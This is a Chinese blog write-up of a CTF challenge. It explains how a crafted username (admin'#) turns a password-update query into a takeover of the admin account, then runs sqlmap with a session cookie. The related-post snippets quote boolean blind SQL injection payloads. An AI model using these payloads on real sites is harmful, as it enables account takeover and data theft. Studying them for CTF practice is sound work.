[NSSRound#1 Basic]sql_by_sql - 二次注入+布尔盲注||sqlmap

已于 2023-10-08 21:00:20 修改
阅读量367 收藏
点赞数
文章标签: sql web安全 安全 ctf
于 2023-10-06 00:56:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ozuoshen123/article/details/133593379
版权
本文详细介绍了SQL注入攻击的一种常见场景,通过思路分析、解题方法和脚本展示了解二次注入和布尔盲注的过程。在注册过程中,利用用户名构造SQL语句实现密码篡改。随后,通过sqlmap工具进行爆破,并手动进行盲注配合Python脚本来探测数据库信息,最终成功获取flag。
摘要由CSDN通过智能技术生成

[NSSRound#1 Basic]sql_by_sql

1

一、思路分析

进入注册界面后
  假设sql:update user set password = ‘’ where username = ‘’ and password = ‘’
    此时如果我们注册的用户名是admin’–+、admin’#、admin’–的话
  update user set password = ‘123’ where username = ‘admin’#’ and password = ‘’

1、所以先注册名为:admin’–+的用户,这样就可以直接修改admin密码,登录后,获取cookie
2、用户界面提供查询功能,但是只能查有或没有该用户,而且不会出现报错,说明是sqllite数据库

二、解题方法

方法一:sqlmap
尝试利用sqlmap爆破,因为查询是在query层次,且是post,所以我们的sqlmap代码如下:
py sqlmap.py -u "http://node4.anna.nssctf.cn:28138/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZOvyaQ.m7kRbsLxlP5nQfHHxv4WpfnAePQ"
——如果这里的url写错了,是查不到的,而且cookie很重要&#

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Hillain
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
SQL注入原理及实践(一)–SQL注入布尔盲注
dulirongdudu的博客
08-02 2148
当不知道数据库返回值的情况下时【无回显】,输入1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔盲注入。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
[NSSRound#1 Basic]sql_by_sql
m0_70819573的博客
04-04 171
所以注册用户admin'--并修改密码就可以登录admin,在home页面的查询有两种回显,exist或no user,显然是布尔盲注,需要注意的是数据库是sqlite,查询语句不太一样。1.打开环境,随便注册一个用户。因NSSCTF收费而没有截图。在修改密码的源码处获得提示。
SQL注入-布尔盲注
acepanhuan的博客
02-10 1710
学习SQL注入方法之盲注
sql注入布尔booler注入
最新发布
m0_52484587的博客
07-09 822
id=1' and substr((select column_name from information_schema.columns where table_schema='test' and table_name='users' limit 0,1),1,1)='a'--+ id username password 等。id=1' and substr(database(),1,1)='a'--+ 逐字判断数据库名为 test,test 数据库名。3.id=1 and 1=2 结果异常。
[NSSRound#1 Basic]
ki10Moc的博客
08-03 548
看了本文会影响您一天的好心情的
每日练习-[NSSRound#1 Basic]sql_by_sql
m0_68113265的博客
08-20 112
注册页面尝试进行覆盖admin用户。但是admin'#报错了。id处尝试注入发现存在就回显exist 不存在就回显no user。登录成功,进行修改密码然后登录admin账号。sqlmap直接跑,注入页面为/query。有个查询按钮 bp抓包进行查看。
SQL注入——布尔盲注
heyingcheng的博客
03-07 705
当猜测是第一个字母的ascii码是115,页面显示为真,再查表,得出对应字母。后续的操作是依次猜解,陆续得出数据。布尔盲注Web页面只返回True真,False假两种类型,利用页面的返回不同,逐个猜解数据。页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。对方既没有回显位又没有报错,如果页面有真假值切换,我们就可以使用布尔盲注。当我们猜解数据库名称的第一个字母的ascii是120,页面显示false。盲注分类:布尔盲注,时间盲注,报错盲注
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入盲注类型,并...
sqlmap_自动化sql注入引擎_None_sqlmap_sql注入_sql_flath1c_vulnerability_
10-02
SQL注入SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
sql注入扫描_sqlmap-1.1.3.zip
02-13
SQLMap是一款强大的自动化SQL注入工具,它可以帮助安全研究人员或者渗透测试人员检测网站是否存在SQL注入漏洞。在版本sqlmap-1.1.3中,该工具已经兼容Python3,这扩大了它的使用范围,因为Python3逐渐成为主流的编程...
ibatis-sqlmap-2.3.4.741-sources.zip_4 3 2 1_ibatis-sqlm_ibatis-s
09-23
标题 "ibatis-sqlmap-2.3.4.741-sources.zip_4 3 2 1_ibatis-sqlm_ibatis-s" 暗示了这是一个关于iBATIS SQLMap的源码包,版本号为2.3.4.741,可能是一个增强或修改后的版本,具有特定的优化和改进。描述中提到了针对...
[陇剑杯 2021]之Misc篇(NSSCTF)刷题记录⑤
Aluxian_的博客
04-26 2056
[陇剑杯 2021]之Misc篇(NSSCTF)刷题记录⑤
sql注入整理之布尔盲注
qq_37079022的博客
07-14 1844
1' and ascii(substr(database(),1,1))=1 -- 使用ascii将值变为数字。1' and substr(database(),1,1)='a' -- 显示 不存在。1' and substr(database(),1,1)='b' -- 显示 不存在。1' and substr(database(),1,1)='c' -- 显示 不存在。1' and substr(database(),1,1)='a' -- 显示 不存在。
布尔类型的SQL盲注注入
m0_64368365的博客
02-20 1705
布尔盲注适用于无回显的情况,只有通过true或false及页面是否正常来判断所输入内容是否正确。
SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
weixin_43263566的博客
01-21 4382
SQL注入篇 - 布尔盲注及延时注入
NSSCTF Round#1 Basic [nss2022年4月3日个人赛]web的题解
weixin_51458899的博客
04-04 2509
[nss个人赛]basic_check(复现) (83条消息) Nikto安装和使用_半砖的博客-CSDN博客_nikto安装 参考:https://blog.51cto.com/dearch/2053703 单纯复现比较简单 [nssctf个人赛]sql_for_sql 站点功能是: 登录 注册 改密码 登录和注册均没有注入点 考虑改密码的时候会二次注入 结果的确发现了异常,无论是用户名一开始注册的时候加了单引号,还是新密码用了单引号,状态码会报500, 推测改密码的后台sql select p
SQL注入漏洞之布尔(Boolean)注入
m0_71109835的博客
02-01 1214
其一,前端传到后端的数据内容是用户可以控制的,如果这些数据不是用户可以控制的话SQL注入漏洞就无从谈起。其二:用户输入的参数可以拼接的SQL语句中,并且可以被执行。:SQL注入之所以得以存在主要是因为WEB应用程序对用户输入的数据没有进行有效的判断和过滤,从而导致用户的恶意SQL语句从前端传到后端,最后实现了对数据的窃取和破环。学习SQL注入首先要对一些常见的SQL语法有一定的了解,这样我们在使用SQL注入漏洞攻击对方时才能游刃有余。5.在得知数据库名字长度后,我们可以用穷举的方法猜测出数据库的名字。
SQL注入之路之二:布尔型(boolean)盲注
weixin_62715196的博客
08-10 1188
简单描述什么是布尔盲注以及对与布尔盲注如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔注入的合理性
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hillain

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值